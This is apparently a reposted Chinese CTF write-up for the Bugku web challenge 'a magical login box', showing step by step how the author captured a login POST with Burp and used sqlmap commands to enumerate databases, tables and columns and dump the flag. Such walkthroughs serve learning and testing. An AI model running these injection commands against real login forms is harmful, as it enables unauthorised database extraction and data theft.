這是一個神奇的登入框(Bugku-web題 使用sqlmap注入例項)
阿新 • • 發佈:2019-01-28
正在學習sqlmap,拿這個題先入門一下。
先看下原始碼:
是post提交,url明顯提示是個sql注入,由於post提交,要sql和burp結合起來使用。
首先burp抓包,抓到包後選擇存到txt檔案中:(隨便輸入賬號密碼)
我儲存到了D盤的1.txt裡。
然後開啟sqlmap,輸入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解釋一下 -r是讀檔案 後面是剛才儲存的絕對路徑,-p是引數,也就是注入點(選了admin_name是注入點) --dbs意思是想獲取資料庫名字
可以看到sqlmap獲得了資料庫的名字:
應該是這個bugkul1,再繼續爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解釋:-D是表示選擇了後面的這個資料庫 --tables是想獲取表
可以看到爆出了表:
應該在flag1這個表裡,繼續爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解釋類似上面 不過加了一個-T 指定表
可以發現爆出了列名:
flag1這個列 最後查欄位 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解釋:同上面 --dump是獲取欄位的命令
(在這過程中可能會讓你選擇Y或者N 我直接回車的)
可以看到爆出了flag: